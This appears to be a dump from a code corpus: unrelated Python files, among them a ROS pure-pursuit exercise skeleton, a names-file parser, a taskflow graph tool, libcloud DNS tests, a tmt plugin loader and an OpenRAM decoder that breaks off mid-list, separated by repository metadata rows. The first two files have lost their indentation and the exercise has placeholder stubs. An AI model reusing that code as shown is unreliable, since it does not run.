The distance to the goal
"""
#---------------------------------------------------------
# YOUR CODE HERE
w = 0.0
d = 0.0
v = 0.0
#---------------------------------------------------------
return w, v, d
def steer_towards_point_controller(x, y, v):
"""
Given an intermediate goal point and a (constant) linear velocity, calculates the
angular velocity that will steer the robot towards the goal such that the robot
moves in a circular arc that passes through the intermediate goal point.
Arguments
---------
x : float
The x-coordinate of the goal in the reference frame of the robot, in m
y : float
The x-coordinate of the goal in the reference frame of the robot, in m
v : float
The linear velocity in m/s
Returns
---------
w : float
The angular velocity in rad/s
"""
#---------------------------------------------------------
# YOUR CODE HERE
w = 0.0
#---------------------------------------------------------
return w
def get_goal_point(p0, p1, L):
"""
Returns the intermediate goal point for the pure pursuit algorithm. If no point
on the line going through p0 and p1 is at distance L from the origin, then the
returned beta should be a nan.
Arguments
---------
p0 : array-like (2,)
The current waypoint.
p1 : array-like (2,)
The next waypoint.
L : float\n",
The look-ahead distance
Returns\n",
-------\n",
pg : ndarray (2,)
The intermediate goal point
beta : float
The value giving the position of the goal point on the line connectin p0 and p1.
"""
p0 = np.asarray(p0)
p1 = np.asarray(p1)
w = p1-p0
a = np.dot(w, w)
b = 2*np.dot(p0, w)
c = np.dot(p0, p0) - L**2
d = b**2 - 4*a*c
if d < 0:
pg = p0
beta = np.nan
else:
#---------------------------------------------------------
# YOUR CODE HERE
beta = 0.0
pg = [0,0]
#---------------------------------------------------------
return pg, beta
class Go2Point(py_trees.behaviour.Behaviour):
"""
Takes a point to go to as input and will go towards that point until within
given distance.
"""
def __init__(self, name="Go2Point"):
"""
Default construction.
"""
super(Go2Point, self).__init__(name)
self.logger.debug("%s.__init__()" % (self.__class__.__name__))
def setup(self, goal, distance, cmd_vel_pub, tf_buffer, robot_frame='base_link',
vel_max=0.6, K_theta=4.0, alpha=4.0):
"""
Arguments
---------
goal : PointStamped
The goal point.
distance : float
When inside this distance, Success is returned.
cmd_vel_pub : Publisher
Publisher that publishes to the /cmd_vel topic
tf_buffer : tf2_ros.Buffer
Transform buffer for transforming the waypoints.
robot_frame : String
The name of reference frame of the robot.
vel_max : float
The maximum linear velocity to command.
K_theta : float
The gain for the angular part of the controller.
alpha : float
The parameter for setting the linear velocity.
"""
self.goal = goal
self.dist = distance
self.cmd_vel_pub = cmd_vel_pub
self.tf_buffer = tf_buffer
self.robot_frame = robot_frame
self.vel_max = vel_max
self.K_theta = K_theta
self.alpha = alpha
self.msg = geometry_msgs.msg.Twist()
return True
def initialise(self):
"""
Since simple proportional control, no initialization needed. In case
of PI, PD, or PID, the controller would have some state that should
be initialized here.
"""
pass
def update(self):
"""
Do the work:
1) Transform waypoint to robot-centric frame
2) Compute the control signal
3) Publish the control signal
"""
#----------------------------------------------------
# YOUR CODE HERE
# Transform the point to the robot reference frame
self.goal.header.stamp = rospy.Time(0)
goal_b = self.tf_buffer.transform(...)
#----------------------------------------------------
w, v, dist = go_to_point_controller(goal_b.point.x, goal_b.point.y,
self.vel_max, self.K_theta, self.alpha)
if dist < self.dist:
# Within the desired distance, so return success
return py_trees.Status.SUCCESS
else:
#----------------------------------------------------
# YOUR CODE HERE
# Publish the velocity command to cmd_vel
self.msg.linear.x = v # etc.
#----------------------------------------------------
return py_trees.Status.RUNNING
def terminate(self, new_status):
"""
Nothing to clean up
"""
pass
class PursuitGoal(py_trees.behaviour.Behaviour):
"""
Takes two waypoints (current and next) and goes toward a point on
the line joining the two waypoints and at the look-ahead distance.
Returns SUCCESS when the next intermediate goal point is past the
next waypoint.
Returns RUNNING when still moving along the trajectory between the
two waypoints.
Returns FAILURE if no point on the trajectory is at the
look-ahead distance from the robot.
"""
def __init__(self, name="PursuitGoal"):
"""
Default construction.
"""
super(PursuitGoal, self).__init__(name)
self.logger.debug("%s.__init__()" % (self.__class__.__name__))
def setup(self, wp0, wp1, look_ahead_distance,
cmd_vel_pub, tf_buffer, robot_frame='base_link',
vel_max=0.6):
"""
Arguments
---------
wp0 : array-like (2,)
The current waypoint.
wp1 : array-like (2,)
The next waypoint.
look_ahead_distance : float
The main parameter of the pure pursuit algorithm
cmd_vel_pub : Publisher
Publisher that publishes to the /cmd_vel topic
tf_buffer : tf2_ros.Buffer
Transform buffer for transforming the waypoints.
robot_frame : String
The name of reference frame of the robot.
vel_max : float
The maximum linear velocity to command.
"""
self.wp0 = wp0
self.wp1 = wp1
self.L = look_ahead_distance
self.cmd_vel_pub = cmd_vel_pub
self.tf_buffer = tf_buffer
self.robot_frame = robot_frame
self.vel_max = vel_max
self.msg = geometry_msgs.msg.Twist()
return True
def initialise(self):
"""
Since simple proportional control, no initialization needed. In case
of PI, PD, or PID, the controller would have some state that should
be initialized here.
"""
pass
def update(self):
"""
Do the work:
1) Transform waypoints to robot-centric frame
2) Compute the control signal
3) Publish the control signal
"""
#------------------------------------------------------------
# YOUR CODE HERE
# Transform the two waypoints to the robot reference frame
self.wp0.header.stamp = rospy.Time(0)
self.wp1.header.stamp = rospy.Time(0)
wp0_b = self.tf_buffer.transform(...)
wp1_b = self.tf_buffer.transform(...)
#------------------------------------------------------------
pg, beta = get_goal_point([wp0_b.point.x, wp0_b.point.y],
[wp1_b.point.x, wp1_b.point.y],
self.L)
if beta > 1.0:
# Succeeded in moving along the trajectory from current to next waypoint
# Time to move on to next pair of waypoints
return py_trees.Status.SUCCESS
elif np.isnan(beta):
# Not able to find point on trajectory at look-ahead-distance
# from the robot. Means failure.
return py_trees.Status.FAILURE
else:
w = steer_towards_point_controller(pg[0], pg[1], self.vel_max)
#----------------------------------------------------
# YOUR CODE HERE
# Publish the velocity command to cmd_vel
#----------------------------------------------------
return py_trees.Status.RUNNING
def terminate(self, new_status):
"""
Nothing to clean up
"""
pass
def create_behavior_tree(waypoints, frame, look_ahead_dist, vel_max,
K_theta, alpha):
"""
Constructs and returns the behavior tree.
The tree has only one level with a sequence of nodes, all of which
must succeed in order to perform the task.
"""
# Setup stuff for ROS communication
tf_buffer = tf2_ros.Buffer()
tf2_ros.TransformListener(tf_buffer)
cmd_vel_pub = rospy.Publisher('/cmd_vel' , geometry_msgs.msg.Twist, queue_size=1 )
root = py_trees.composites.Sequence("PurePursuit")
# Setup and add node handling the first waypoint. We should go towards this point
# until it is at a distance within the look-ahead-distance from the
# robot.
g2p = Go2Point()
g2p.setup(waypoints[0], look_ahead_dist, cmd_vel_pub, tf_buffer,
vel_max=vel_max, K_theta=K_theta, alpha=alpha)
root.add_child(g2p)
# Add the nodes to handle pairs of waypoints
for cwp_, nwp_ in zip(waypoints[:-1], waypoints[1:]):
pg = PursuitGoal()
pg.setup(cwp_, nwp_, look_ahead_dist, cmd_vel_pub,
tf_buffer, vel_max=vel_max)
root.add_child(pg)
#----------------------------------------------------------------------------
# YOUR CODE HERE
# Add the final node to go to the last waypoint, which is the final goal point
#
#----------------------------------------------------------------------------
return root
if __name__ == '__main__':
rospy.init_node('Pure_pursuit')
L = rospy.get_param("/pure_pursuit/look_ahead_distance", 0.3)
vmax = rospy.get_param("/pure_pursuit/vel_lin_max", 0.6)
Kth = rospy.get_param("/pure_pursuit/K_theta", 4)
alpha = rospy.get_param("/pure_pursuit/alpha", 4)
frame = rospy.get_param("/pure_pursuit/frame")
rate = rospy.get_param("/pure_pursuit/rate", 10)
waypoints = rospy.get_param("/waypoints", [-4,-4, -4, 2])
waypoints = np.reshape(waypoints, (-1, 2))
waypoints_ps = []
for wp_ in waypoints:
p = PointStamped()
p.header.frame_id = frame
p.point.x = wp_[0]
p.point.y = wp_[1]
waypoints_ps.append(p)
bt_tree = create_behavior_tree(waypoints_ps, frame, L, vmax,
Kth, alpha)
rosrate = rospy.Rate(rate)
while not rospy.is_shutdown():
bt_tree.tick_once()
rosrate.sleep()
| 32.033419 | 91 | 0.539443 |
4a25879b3b9821620d7aacc564df1c717b81e8c1 | 3,445 | py | Python | python/names.py | tmcombi/tmcombi | 976d3f333c01104e5efcabd8834854ad7677ea73 | [
"MIT"
] | null | null | null | python/names.py | tmcombi/tmcombi | 976d3f333c01104e5efcabd8834854ad7677ea73 | [
"MIT"
] | null | null | null | python/names.py | tmcombi/tmcombi | 976d3f333c01104e5efcabd8834854ad7677ea73 | [
"MIT"
] | 3 | 2019-03-31T19:04:20.000Z | 2020-01-13T22:32:09.000Z | import unittest
import re
import sys
class Feature:
def __init__(self):
self.name = 'target'
self.type = ''
self.values = []
def dump(self, out_stream=sys.stdout):
print(self.name + ': ', end='', file=out_stream)
if self.type == 'categorical':
print(', '.join(self.values), end='', file=out_stream)
print('.', file=out_stream)
else:
print(self.type + '.', file=out_stream)
class Names:
def __init__(self):
self.feature = {}
self.feature_list = []
self.target_feature = 'target'
def size(self):
return len(self.feature_list)
def target_index(self):
return self.feature_list.index(self.target_feature)
def dump(self, out_stream=sys.stdout):
print(self.target_feature + '. | the target attribute', file=out_stream)
for feature_name in self.feature_list:
self.feature[feature_name].dump(out_stream)
@staticmethod
def process_line(line):
empty = True
feature = Feature()
line = re.sub(r"\n", "", line)
line = re.sub(r"[ ]*\|.*", "", line)
line = re.sub(r"[\. ]*$", "", line)
line = re.sub(r"^[ ]*", "", line)
if line == '':
return empty, feature
empty = False
data = re.split(":", line, 1)
data[0] = re.sub("[ ]*$", "", data[0])
if re.search(",", data[0]):
data.append(data[0])
else:
feature.name = data[0]
if len(data) < 2:
return empty, feature
data[1] = re.sub("^[ ]*", "", data[1])
if data[1] == '':
return empty, feature
if data[1] in ['continuous', 'ignore', 'label']:
feature.type = data[1]
return empty, feature
feature.type = 'categorical'
for value in re.split(",", data[1]):
value = re.sub("[ ]*$", "", value)
value = re.sub("^[ ]*", "", value)
feature.values.append(value)
return empty, feature
def from_file(self, file):
fp = open(file, 'r')
empty, target_feature = Names.process_line(fp.readline())
while empty:
empty, target_feature = Names.process_line(fp.readline())
self.target_feature = target_feature.name
line = fp.readline()
while line:
empty, feature = Names.process_line(line)
if not empty:
self.feature[feature.name] = feature
self.feature_list.append(feature.name)
line = fp.readline()
fp.close()
if self.target_feature not in self.feature_list:
self.feature[self.target_feature] = target_feature
self.feature_list.append(self.target_feature)
return self
class TestNames(unittest.TestCase):
def test_feature(self):
f = Feature()
f.name = 'testName'
self.assertEqual(f.name, 'testName')
def test_names_basic(self):
N = Names()
self.assertTrue(N.target_feature == 'target')
self.assertFalse(N.size() < 0)
def test_names_real_file(self):
N = Names().from_file('adult.names')
self.assertEqual(N.size(), 15)
out_stream = open('adult1.names', 'w')
N.dump(out_stream)
out_stream.close()
self.assertFalse(0 > 0)
if __name__ == "__main__":
unittest.main()
| 30.486726 | 80 | 0.543977 |
4a2587c5e149be72f213194eab1e14c14ca53339 | 2,480 | py | Python | tools/state_graph.py | citrix-openstack-build/taskflow | a285c3c39f85e8c7fb6837a8a99f3cdacbe3fea0 | [
"Apache-2.0"
] | null | null | null | tools/state_graph.py | citrix-openstack-build/taskflow | a285c3c39f85e8c7fb6837a8a99f3cdacbe3fea0 | [
"Apache-2.0"
] | null | null | null | tools/state_graph.py | citrix-openstack-build/taskflow | a285c3c39f85e8c7fb6837a8a99f3cdacbe3fea0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import os
import sys
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir))
sys.path.insert(0, top_dir)
import optparse
import subprocess
import tempfile
import networkx as nx
from taskflow import states
from taskflow.utils import graph_utils as gu
def mini_exec(cmd, ok_codes=(0,)):
stdout = subprocess.PIPE
stderr = subprocess.PIPE
proc = subprocess.Popen(cmd, stdout=stdout, stderr=stderr, stdin=None)
(stdout, stderr) = proc.communicate()
rc = proc.returncode
if rc not in ok_codes:
raise RuntimeError("Could not run %s [%s]\nStderr: %s"
% (cmd, rc, stderr))
return (stdout, stderr)
def make_svg(graph, output_filename, output_format):
# NOTE(harlowja): requires pydot!
gdot = gu.export_graph_to_dot(graph)
if output_format == 'dot':
output = gdot
elif output_format in ('svg', 'svgz', 'png'):
with tempfile.NamedTemporaryFile(suffix=".dot") as fh:
fh.write(gdot)
fh.flush()
cmd = ['dot', '-T%s' % output_format, fh.name]
output, _stderr = mini_exec(cmd)
else:
raise ValueError('Unknown format: %s' % output_filename)
with open(output_filename, "wb") as fh:
fh.write(output)
def main():
parser = optparse.OptionParser()
parser.add_option("-f", "--file", dest="filename",
help="write svg to FILE", metavar="FILE")
parser.add_option("-t", "--tasks", dest="tasks",
action='store_true',
help="use task state transitions",
default=False)
parser.add_option("-T", "--format", dest="format",
help="output in given format",
default='svg')
(options, args) = parser.parse_args()
if options.filename is None:
options.filename = 'states.%s' % options.format
g = nx.DiGraph(name="State transitions")
if not options.tasks:
source = states._ALLOWED_FLOW_TRANSITIONS
else:
source = states._ALLOWED_TASK_TRANSITIONS
for (u, v) in source:
if not g.has_node(u):
g.add_node(u)
if not g.has_node(v):
g.add_node(v)
g.add_edge(u, v)
make_svg(g, options.filename, options.format)
print("Created %s at '%s'" % (options.format, options.filename))
if __name__ == '__main__':
main()
| 30.243902 | 74 | 0.594758 |
4a2588423ca126a16652a75edd3ee516b30cce8f | 1,839 | py | Python | src/data/game_logs.py | robsfletch/bts | c03d821b048fdc2b2735fd77bd193443d40468fc | [
"MIT"
] | null | null | null | src/data/game_logs.py | robsfletch/bts | c03d821b048fdc2b2735fd77bd193443d40468fc | [
"MIT"
] | null | null | null | src/data/game_logs.py | robsfletch/bts | c03d821b048fdc2b2735fd77bd193443d40468fc | [
"MIT"
] | null | null | null | import pandas as pd
import glob
from pathlib import Path
import click
import logging
@click.command()
@click.argument('input_filepath', type=click.Path(exists=True))
@click.argument('output_filepath', type=click.Path())
def main(input_filepath, output_filepath):
"""clean game_logs"""
df = read_data(input_filepath)
processed_df = process_data(df)
processed_df.to_pickle(Path(output_filepath) / 'game_logs.pkl')
def read_data(input_filepath):
"""Read raw data into DataProcessor."""
game_logs = Path(input_filepath) / 'gl1871_2020'
all_files = glob.glob(str(game_logs / "GL*.TXT"))
header_file = Path(input_filepath) / 'game_log_header.csv'
fields = pd.read_csv(header_file)
header = fields['Header'].to_numpy()
types = pd.Series(fields.Type.values,index=fields.Header).to_dict()
li = []
for filename in all_files:
df = pd.read_csv(filename, header=None, names=header, dtype=types,
low_memory=False)
df = df.drop(columns=df.filter(regex='.*Name$').columns)
li.append(df)
df = pd.concat(li, axis=0, ignore_index=True)
return df
def process_data(df, stable=True):
"""Process raw data into useful files for model."""
df['GAME_ID'] = df['HomeTeam'] + df['Date'].map(str) + \
df['DoubleHeader'].map(str)
df['Date'] = pd.to_datetime(df['Date'], format='%Y%m%d')
df['year'] = df.Date.dt.year
df['HomePA'] = (df['HomeAB'] + df['HomeBB'] +
df['HomeHBP'] + df['HomeSF'] + df['HomeSH'])
df['VisitorPA'] = (df['VisitorAB'] + df['VisitorBB']
+ df['VisitorHBP'] + df['VisitorSF'] + df['VisitorSH'])
return df
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
main()
| 31.169492 | 74 | 0.643828 |
4a2589692e79d07e24145e58412ae10440c2b649 | 686 | py | Python | yidianzixun/splash_test/items.py | zfanai/scrapy-study | 9db78e37e594166ecbf599a37771022a9c99e758 | [
"Apache-2.0"
] | null | null | null | yidianzixun/splash_test/items.py | zfanai/scrapy-study | 9db78e37e594166ecbf599a37771022a9c99e758 | [
"Apache-2.0"
] | null | null | null | yidianzixun/splash_test/items.py | zfanai/scrapy-study | 9db78e37e594166ecbf599a37771022a9c99e758 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
#import scrapy
from scrapy.item import Item, Field
class DmozItem(Item):
# define the fields for your item here like:
name = Field()
description = Field()
url = Field()
class TutorialItem(Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
import scrapy
class SplashTestItem(scrapy.Item):
#标题
title = scrapy.Field()
#日期
date = scrapy.Field()
#链接
url = scrapy.Field()
#关键字
keyword = scrapy.Field()
#来源网站
source = scrapy.Field()
| 19.6 | 51 | 0.638484 |
4a258a152e13390926f23b71f8c141ac46288bd8 | 1,873 | py | Python | MimeWriter.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | 1 | 2020-03-12T16:44:10.000Z | 2020-03-12T16:44:10.000Z | MimeWriter.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | MimeWriter.py | theclashingfritz/Cog-Invasion-Online-Dump | 2561abbacb3e2e288e06f3f04b935b5ed589c8f8 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: MimeWriter
import mimetools
__all__ = [
'MimeWriter']
import warnings
warnings.warn('the MimeWriter module is deprecated; use the email package instead', DeprecationWarning, 2)
class MimeWriter:
def __init__(self, fp):
self._fp = fp
self._headers = []
def addheader(self, key, value, prefix=0):
lines = value.split('\n')
while lines and not lines[-1]:
del lines[-1]
while lines and not lines[0]:
del lines[0]
for i in range(1, len(lines)):
lines[i] = ' ' + lines[i].strip()
value = ('\n').join(lines) + '\n'
line = key + ': ' + value
if prefix:
self._headers.insert(0, line)
else:
self._headers.append(line)
def flushheaders(self):
self._fp.writelines(self._headers)
self._headers = []
def startbody(self, ctype, plist=[], prefix=1):
for name, value in plist:
ctype = ctype + ';\n %s="%s"' % (name, value)
self.addheader('Content-Type', ctype, prefix=prefix)
self.flushheaders()
self._fp.write('\n')
return self._fp
def startmultipartbody(self, subtype, boundary=None, plist=[], prefix=1):
self._boundary = boundary or mimetools.choose_boundary()
return self.startbody('multipart/' + subtype, [
(
'boundary', self._boundary)] + plist, prefix=prefix)
def nextpart(self):
self._fp.write('\n--' + self._boundary + '\n')
return self.__class__(self._fp)
def lastpart(self):
self._fp.write('\n--' + self._boundary + '--\n')
if __name__ == '__main__':
import test.test_MimeWriter | 29.730159 | 106 | 0.588361 |
4a258b1c203047319fb9ceb1696b461fdc9981a6 | 8,317 | py | Python | libcloud/test/dns/test_digitalocean.py | rgharris/libcloud | 90971e17bfd7b6bb97b2489986472c531cc8e140 | [
"Apache-2.0"
] | null | null | null | libcloud/test/dns/test_digitalocean.py | rgharris/libcloud | 90971e17bfd7b6bb97b2489986472c531cc8e140 | [
"Apache-2.0"
] | 1 | 2021-12-06T12:29:13.000Z | 2021-12-06T12:29:13.000Z | libcloud/test/dns/test_digitalocean.py | rgharris/libcloud | 90971e17bfd7b6bb97b2489986472c531cc8e140 | [
"Apache-2.0"
] | 1 | 2019-08-05T10:12:02.000Z | 2019-08-05T10:12:02.000Z | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
import sys
import unittest
from libcloud.dns.drivers.digitalocean import DigitalOceanDNSDriver
from libcloud.dns.types import RecordType
from libcloud.test import LibcloudTestCase, MockHttp
from libcloud.test.file_fixtures import DNSFileFixtures
from libcloud.test.secrets import DIGITALOCEAN_v2_PARAMS
from libcloud.utils.py3 import httplib
class DigitalOceanDNSTests(LibcloudTestCase):
def setUp(self):
DigitalOceanDNSDriver.connectionCls.conn_class = DigitalOceanDNSMockHttp
DigitalOceanDNSMockHttp.type = None
self.driver = DigitalOceanDNSDriver(*DIGITALOCEAN_v2_PARAMS)
def test_list_zones(self):
zones = self.driver.list_zones()
self.assertTrue(len(zones) >= 1)
def test_get_zone(self):
zone = self.driver.get_zone("testdomain")
self.assertEqual(zone.id, "testdomain")
def test_get_zone_not_found(self):
DigitalOceanDNSMockHttp.type = "NOT_FOUND"
self.assertRaises(Exception, self.driver.get_zone, "testdomain")
def test_list_records(self):
zone = self.driver.get_zone("testdomain")
records = self.driver.list_records(zone)
self.assertTrue(len(records) >= 1)
self.assertEqual(records[1].ttl, 1800)
self.assertEqual(records[4].ttl, None)
def test_get_record(self):
record = self.driver.get_record("testdomain", "1234564")
self.assertEqual(record.id, "1234564")
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, "123.45.67.89")
self.assertEqual(record.ttl, 1800)
def test_get_record_not_found(self):
DigitalOceanDNSMockHttp.type = "NOT_FOUND"
self.assertRaises(Exception, self.driver.get_zone, "testdomain")
def test_create_zone(self):
DigitalOceanDNSMockHttp.type = "CREATE"
zone = self.driver.create_zone("testdomain")
self.assertEqual(zone.id, "testdomain")
def test_create_record(self):
zone = self.driver.get_zone("testdomain")
DigitalOceanDNSMockHttp.type = "CREATE"
record = self.driver.create_record(
"sub", zone, RecordType.A, "234.56.78.90", extra={"ttl": 60}
)
self.assertEqual(record.id, "1234565")
self.assertEqual(record.type, RecordType.A)
self.assertEqual(record.data, "234.56.78.90")
self.assertEqual(record.ttl, 60)
def test_update_record(self):
record = self.driver.get_record("testdomain", "1234564")
DigitalOceanDNSMockHttp.type = "UPDATE"
record = self.driver.update_record(
record, data="234.56.78.90", extra={"ttl": 60}
)
self.assertEqual(record.id, "1234564")
self.assertEqual(record.data, "234.56.78.90")
self.assertEqual(record.ttl, 60)
def test_delete_zone(self):
zone = self.driver.get_zone("testdomain")
DigitalOceanDNSMockHttp.type = "DELETE"
self.assertTrue(self.driver.delete_zone(zone))
def test_delete_record(self):
record = self.driver.get_record("testdomain", "1234564")
DigitalOceanDNSMockHttp.type = "DELETE"
self.assertTrue(self.driver.delete_record(record))
class DigitalOceanDNSMockHttp(MockHttp):
fixtures = DNSFileFixtures("digitalocean")
response_map = {
None: httplib.OK,
"CREATE": httplib.CREATED,
"DELETE": httplib.NO_CONTENT,
"EMPTY": httplib.OK,
"NOT_FOUND": httplib.NOT_FOUND,
"UNAUTHORIZED": httplib.UNAUTHORIZED,
"UPDATE": httplib.OK,
"UNPROCESSABLE": httplib.UNPROCESSABLE_ENTITY,
}
def _v2_domains(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_CREATE(self, method, url, body, headers):
if body is None:
body = self.fixtures.load("_v2_domains_UNPROCESSABLE_ENTITY.json")
return (
self.response_map["UNPROCESSABLE"],
body,
{},
httplib.responses[self.response_map["UNPROCESSABLE"]],
)
body = self.fixtures.load("_v2_domains_CREATE.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_DELETE(self, method, url, body, headers):
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_NOT_FOUND(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain_NOT_FOUND.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain_records.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_CREATE(self, method, url, body, headers):
if body is None:
body = self.fixtures.load("_v2_domains_UNPROCESSABLE_ENTITY.json")
return (
self.response_map["UNPROCESSABLE"],
body,
{},
httplib.responses[self.response_map["UNPROCESSABLE"]],
)
body = self.fixtures.load("_v2_domains_testdomain_records_CREATE.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_1234564(self, method, url, body, headers):
body = self.fixtures.load("_v2_domains_testdomain_records_1234564.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_1234564_DELETE(self, method, url, body, headers):
self.type = "DELETE"
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
def _v2_domains_testdomain_records_1234564_UPDATE(self, method, url, body, headers):
if body is None:
body = self.fixtures.load("_v2_domains_UNPROCESSABLE_ENTITY.json")
return (
self.response_map["UNPROCESSABLE"],
body,
{},
httplib.responses[self.response_map["UNPROCESSABLE"]],
)
body = self.fixtures.load("_v2_domains_testdomain_records_1234564_UPDATE.json")
return (
self.response_map[self.type],
body,
{},
httplib.responses[self.response_map[self.type]],
)
if __name__ == "__main__":
sys.exit(unittest.main())
| 35.695279 | 88 | 0.635085 |
4a258b9013113f36df8b5c02f8b69c98b857fde0 | 1,540 | py | Python | tmt/plugins.py | RHEmployee/tmt | a21483016cff4ac6959e3294078c16301c9a9778 | [
"MIT"
] | null | null | null | tmt/plugins.py | RHEmployee/tmt | a21483016cff4ac6959e3294078c16301c9a9778 | [
"MIT"
] | null | null | null | tmt/plugins.py | RHEmployee/tmt | a21483016cff4ac6959e3294078c16301c9a9778 | [
"MIT"
] | null | null | null | # coding: utf-8
""" Handle Steps Plugins """
import importlib
import os
import pkgutil
import sys
import fmf
import tmt
log = fmf.utils.Logging('tmt').logger
def explore():
""" Explore all available plugins """
# Check all tmt steps for native plugins
root = os.path.dirname(os.path.realpath(tmt.__file__))
for step in tmt.steps.STEPS:
for module in discover(os.path.join(root, 'steps', step)):
import_(f'tmt.steps.{step}.{module}')
# Check environment variable for user plugins
try:
paths = [
os.path.realpath(os.path.expandvars(os.path.expanduser(path)))
for path in os.environ['TMT_PLUGINS'].split(' ')]
except KeyError:
log.debug('No custom plugin locations detected in TMT_PLUGINS.')
paths = []
for path in paths:
for module in discover(path):
if path not in sys.path:
sys.path.insert(0, path)
import_(module, path)
def import_(module, path=None):
""" Attempt to import requested module """
try:
importlib.import_module(module)
log.debug(f"Successfully imported the '{module}' module.")
except ImportError as error:
raise SystemExit(
f"Failed to import the '{module}' module" +
(f" from '{path}'." if path else ".") + f"\n({error})")
def discover(path):
""" Discover available plugins for given paths """
for _, name, package in pkgutil.iter_modules([path]):
if not package:
yield name
| 27.017544 | 74 | 0.614286 |
4a258bfbdc6270773b858b60a11d0663f8886af6 | 3,499 | py | Python | compiler/modules/hierarchical_predecode4x16.py | marwaneltoukhy/OpenRAM | ed9d32c7bc105db2a438d36d4b2d852152a79e3b | [
"BSD-3-Clause"
] | 1 | 2020-07-05T16:08:47.000Z | 2020-07-05T16:08:47.000Z | compiler/modules/hierarchical_predecode4x16.py | marwaneltoukhy/OpenRAM | ed9d32c7bc105db2a438d36d4b2d852152a79e3b | [
"BSD-3-Clause"
] | null | null | null | compiler/modules/hierarchical_predecode4x16.py | marwaneltoukhy/OpenRAM | ed9d32c7bc105db2a438d36d4b2d852152a79e3b | [
"BSD-3-Clause"
] | null | null | null | # See LICENSE for licensing information.
#
# Copyright (c) 2016-2019 Regents of the University of California and The Board
# of Regents for the Oklahoma Agricultural and Mechanical College
# (acting for and on behalf of Oklahoma State University)
# All rights reserved.
#
from hierarchical_predecode import hierarchical_predecode
from globals import OPTS
class hierarchical_predecode4x16(hierarchical_predecode):
"""
Pre 4x16 decoder used in hierarchical_decoder.
"""
def __init__(self, name, height=None):
hierarchical_predecode.__init__(self, name, 4, height)
self.create_netlist()
if not OPTS.netlist_only:
self.create_layout()
def create_netlist(self):
self.add_pins()
self.add_modules()
self.create_input_inverters()
connections=[["inbar_0", "inbar_1", "inbar_2", "inbar_3", "out_0", "vdd", "gnd"],
["in_0", "inbar_1", "inbar_2", "inbar_3", "out_1", "vdd", "gnd"],
["inbar_0", "in_1", "inbar_2", "inbar_3", "out_2", "vdd", "gnd"],
["in_0", "in_1", "inbar_2", "inbar_3", "out_3", "vdd", "gnd"],
["inbar_0", "inbar_1", "in_2", "inbar_3", "out_4", "vdd", "gnd"],
["in_0", "inbar_1", "in_2", "inbar_3", "out_5", "vdd", "gnd"],
["inbar_0", "in_1", "in_2", "inbar_3", "out_6", "vdd", "gnd"],
["in_0", "in_1", "in_2", "inbar_3", "out_7", "vdd", "gnd"],
["inbar_0", "inbar_1", "inbar_2", "in_3", "out_0", "vdd", "gnd"],
["in_0", "inbar_1", "inbar_2", "in_3", "out_1", "vdd", "gnd"],
["inbar_0", "in_1", "inbar_2", "in_3", "out_2", "vdd", "gnd"],
["in_0", "in_1", "inbar_2", "in_3", "out_3", "vdd", "gnd"],
["inbar_0", "inbar_1", "in_2", "in_3", "out_4", "vdd", "gnd"],
["in_0", "inbar_1", "in_2", "in_3", "out_5", "vdd", "gnd"],
["inbar_0", "in_1", "in_2", "in_3", "out_6", "vdd", "gnd"],
["in_0", "in_1", "in_2", "in_3", "out_7", "vdd", "gnd"] ]
self.create_and_array(connections)
def get_and_input_line_combination(self):
""" These are the decoder connections of the AND gates to the A,B pins """
combination = [["Abar_0", "Abar_1", "Abar_2", "Abar_3"],
["A_0", "Abar_1", "Abar_2", "Abar_3"],
["Abar_0", "A_1", "Abar_2", "Abar_3"],
["A_0", "A_1", "Abar_2", "Abar_3"],
["Abar_0", "Abar_1", "A_2" , "Abar_3"],
["A_0", "Abar_1", "A_2" , "Abar_3"],
["Abar_0", "A_1", "A_2" , "Abar_3"],
["A_0", "A_1", "A_2" , "Abar_3"],
